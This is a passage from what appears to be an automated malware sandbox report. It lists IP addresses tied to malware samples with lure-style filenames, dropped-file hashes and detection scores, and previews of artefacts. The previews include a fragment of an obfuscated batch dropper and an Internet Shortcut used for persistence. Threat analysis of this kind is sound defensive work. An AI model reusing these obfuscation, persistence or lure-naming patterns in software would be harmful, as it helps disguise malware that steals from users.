                                                                                                          • 172.67.74.152
                                                                                                          fefbBqMKcU.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                          • 172.67.74.152
                                                                                                          yh5At5T1Zs.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          scan3762399_arleen@wcctxlaw.com.pdfGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.74.152
                                                                                                          x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 104.26.13.205
                                                                                                          neworigin.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.12.205
                                                                                                          gxe0.comx.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          pywolwnvd.bizx.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 54.244.188.177
                                                                                                          TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 54.244.188.177
                                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 54.244.188.177
                                                                                                          AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 54.244.188.177
                                                                                                          E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                          • 54.244.188.177
                                                                                                          Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 54.244.188.177
                                                                                                          AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 54.244.188.177
                                                                                                          SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 54.244.188.177
                                                                                                          AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 54.244.188.177
                                                                                                          RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 54.244.188.177
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CLOUDFLARENETUShttps://uxfol.io/p/b02d8c67/029f480aGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.3
                                                                                                          EXT_Transaction Details for Martibs -462fd4a1151861ecbc00b016e69e7825 (18.7 KB).msgGet hashmaliciousUnknownBrowse
                                                                                                          • 104.17.25.14
                                                                                                          https://www.trendytechinsight.com/sxGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.3
                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                          • 172.64.41.3
                                                                                                          View Pdf Doc_64a1d1f34487fde7a21830b013c89f85.htmGet hashmaliciousUnknownBrowse
                                                                                                          • 104.17.25.14
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.150.243
                                                                                                          Payload.exeGet hashmaliciousPython Stealer, BLX Stealer, XLABB GrabberBrowse
                                                                                                          • 172.67.74.152
                                                                                                          aba5298f.msiGet hashmaliciousUnknownBrowse
                                                                                                          • 104.18.86.42
                                                                                                          FW Cardenas Leslie shared Mathis IDS Remittance Copy with you.msgGet hashmaliciousUnknownBrowse
                                                                                                          • 104.18.11.207
                                                                                                          Payload.exeGet hashmaliciousPython Stealer, BLX Stealer, XLABB GrabberBrowse
                                                                                                          • 104.26.12.205
                                                                                                          HAWKHOSTCAx.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                                          • 198.252.98.54
                                                                                                          SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 198.252.98.54
                                                                                                          PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 198.252.106.191
                                                                                                          https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_AGet hashmaliciousUnknownBrowse
                                                                                                          • 198.252.106.147
                                                                                                          OVHFRPreventivo#09678.exeGet hashmaliciousRedLineBrowse
                                                                                                          • 193.70.111.186
                                                                                                          SecurityHealthService.exeGet hashmaliciousAsyncRAT, DarkTortilla, XWormBrowse
                                                                                                          • 213.32.110.214
                                                                                                          meerkat.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 144.2.61.131
                                                                                                          QUOTATION#09678.exeGet hashmaliciousRedLineBrowse
                                                                                                          • 193.70.111.186
                                                                                                          x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 51.195.88.199
                                                                                                          neworigin.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 51.195.88.199
                                                                                                          TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 51.195.88.199
                                                                                                          https://sharepoint-business.com/?rid=eprRhgrGet hashmaliciousUnknownBrowse
                                                                                                          • 51.178.43.144
                                                                                                          http://matomo.uk.oxa.cloudGet hashmaliciousUnknownBrowse
                                                                                                          • 51.195.180.103
                                                                                                          zgp.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 51.222.237.206
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0ehttps://uxfol.io/p/b02d8c67/029f480aGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                          • 104.26.12.205
                                                                                                          https://bonzibuddy.org/Bonzi.zipGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          https://wetransfer.com/downloads/dfae2da4024c0a427ba385707deb5ffa20240620022822/9659fcGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          Company Profile_pdf.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          SUNNY (1).exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.26.12.205
                                                                                                          SFL OP990M3 PO.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          http://junocis.comGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          SecurityHealthService.exeGet hashmaliciousAsyncRAT, DarkTortilla, XWormBrowse
                                                                                                          • 104.26.12.205
                                                                                                          FIZETESI.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 198.252.105.91
                                                                                                          EditLoc.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 198.252.105.91
                                                                                                          lavi.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                          • 198.252.105.91
                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 198.252.105.91
                                                                                                          Updatev4_5.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 198.252.105.91
                                                                                                          apptext.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                          • 198.252.105.91
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Users\Public\Libraries\lxsyrsiW.pifx.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                            TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                              Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                  NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                                                    r876789878767.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                      2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                        New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                          E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                            z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1290240
                                                                                                                              Entropy (8bit):5.2777664154104835
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:mImGUcsvZZdubv7hfl3CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlSsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                              MD5:664D172495F217F5E97FEF6698AE074C
                                                                                                                              SHA1:C6AAB671D5255E214AAC87DC919325F191CE881D
                                                                                                                              SHA-256:5FDB7A5D9F7BE97A981C8F598A0902437397ED063C15093264053AA4C3922A99
                                                                                                                              SHA-512:231D16CB0BE2466567618E96D71F9F2B46A41B808CC6E541CD9ADB72FFB57912B59D6174031A4A1470963DF220CC7144A5C95995219F9B5A8E6CC736BA9A186B
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4
                                                                                                                              Entropy (8bit):2.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Ovn:Ovn
                                                                                                                              MD5:89B289543B1801050A1FA5F665682F9B
                                                                                                                              SHA1:F01FC9F97420AD6AEAF09BE80D1D9BA5B69C4A19
                                                                                                                              SHA-256:ABCA10E5C0FF2B657C09CD50D7AA667175FE7A1402550D6C43547EBF49FA71D6
                                                                                                                              SHA-512:216E44DAC574B670E8BDE073574316C58145C7AF6A89506534FE67E82C3D4DFDC5EBE39AC9C13181C6EC1F846ECB9ABADAAB6BD9FB7C3F03AE3524223D79733A
                                                                                                                              Malicious:false
                                                                                                                              Preview:86..
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1921890
                                                                                                                              Entropy (8bit):7.398856770638502
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:uFLsbSRbR4KUHq/dhv95pz9P8/P/lUtAQXI53D7/vwpU19uyXABAtIFBlZ:ULhRGYHKOBlZ
                                                                                                                              MD5:34E82F30B12F324DB1D2604CFA91CBB2
                                                                                                                              SHA1:20001D49CD86B776EE8072A07F536B7330A77F97
                                                                                                                              SHA-256:F1821B6BA4856A51354BEED61C0F325D39901D70F9FF1792A63758FFEA32FCEF
                                                                                                                              SHA-512:47ADC8F19359C4DC9E073C7A464E3F5F0367AC6A06BB6AA741AA06FE8BD762ADB86304415623FB411E69CACC573E66E6397689C47B7291747E057E5BF001C1C1
                                                                                                                              Malicious:true
                                                                                                                              Preview:...Y#..K..&$..'.#'...%.... %" ...... ..&.....&..$"%.#$'#....'...... '%.%!... .%.''"". "#".%..&.&........%........."!...#'....Y#..K.. .& %.. ...Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.........P.O..."..../....8....\..%.
                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1224192
                                                                                                                              Entropy (8bit):6.917641485036678
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:Trd1nILlwmOWmdsNMRyHfeKx2b9O0xOaHAgfctN:TraaxkOb9XxOaHAgfctN
                                                                                                                              MD5:86EE0E8789E9C11F707D056C4052292E
                                                                                                                              SHA1:E14A7C7C230EFEEC03D671A91ECE4EDE1799F899
                                                                                                                              SHA-256:A3992C7D83574EF92D815F6102721F33CFAE92461F518ACC4196A1EE5AD3EDE7
                                                                                                                              SHA-512:4A6A8DC4FB82483B8297BF4199CCCFD4A1C32CF52CDAD42EB0E015ABBA815A29BF3123D65BD8EA4E8C6EFC630B7D7DCB9EE192F141514C8BA48E52A47D7C88EF
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..........................P...................@...............................(......................................................................................T............................text............................... ..`.itext..|........................... ..`.data...P6... ...8..................@....bss.....6...`.......8...................idata...(.......*...8..............@....tls....4............b...................rdata...............b..............@..@.reloc...............d..............@..B.rsrc...............................@..@.............P......................@..@................................................................................................
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):62357
                                                                                                                              Entropy (8bit):4.705712327109906
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                              MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                              SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                              SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                              SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                              Malicious:false
                                                                                                                              Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):68096
                                                                                                                              Entropy (8bit):6.328046551801531
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                              MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                              SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                              SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                              SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: x.exe, Detection: malicious, Browse
                                                                                                                              • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse
                                                                                                                              • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious, Browse
                                                                                                                              • Filename: NEOMS_EOI_FORM.cmd, Detection: malicious, Browse
                                                                                                                              • Filename: NEOMS_EOI_FORM.GZ, Detection: malicious, Browse
                                                                                                                              • Filename: r876789878767.cmd, Detection: malicious, Browse
                                                                                                                              • Filename: 2tKeEoCCCw.exe, Detection: malicious, Browse
                                                                                                                              • Filename: New_Order_PO_GM5637H93.cmd, Detection: malicious, Browse
                                                                                                                              • Filename: E_dekont.cmd, Detection: malicious, Browse
                                                                                                                              • Filename: z1Transaction_ID_REF2418_cmd.bat, Detection: malicious, Browse
                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF">), ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):104
                                                                                                                              Entropy (8bit):5.087318387440537
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM6tZsbxsvcPS:HRYFVmTWDyzPtZExfPS
                                                                                                                              MD5:5960D3AAE90BDE057FA91551BBCD38EC
                                                                                                                              SHA1:1CD8C9AC0E85F492852E167C9513B9D84BB5D2F7
                                                                                                                              SHA-256:FCB9F2AB41017FB82E18DF5610F8B106134A992D719572D95AC7EE40E19DF15A
                                                                                                                              SHA-512:A8856D8823950B1D0291D95AC4FD7EFD7BA5F1629E6703C215D0319C17677F13817259A5B6F67F170F5B263795AD5F680A8EA51F457AD05035B4D0E010CD5B6C
                                                                                                                              Malicious:true
                                                                                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF"..IconIndex=923980..HotKey=91..
                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):236544
                                                                                                                              Entropy (8bit):6.4416694948877025
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                              MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                              SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                              SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                              SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):410
                                                                                                                              Entropy (8bit):5.361827289088002
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                              MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                              SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                              SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                              SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):410
                                                                                                                              Entropy (8bit):5.361827289088002
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                              MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                              SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                              SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                              SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2232
                                                                                                                              Entropy (8bit):5.379401388151058
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugei/ZPUyus:fLHxvIIwLgZ2KRHWLOugss
                                                                                                                              MD5:AE6DF85157F6BF3C6D9A1FF77B6B442B
                                                                                                                              SHA1:16EFB3DD6B191D135EBB0D3E01C0B86EA3E7DFEC
                                                                                                                              SHA-256:807D3BFCD4C81BBB6C2FA2A9D79D08CB3040DB48512304EA5ADEF746DAD879AE
                                                                                                                              SHA-512:0DA4437659BC9636F6EC248C482935ADDAD8DB2FC69F5F663553D0ED10D6A955B2CF6C8661ED9E6135DC64D3FE6895EC88443B5C7C947B2B08EB291193670C7E
                                                                                                                              Malicious:false
                                                                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
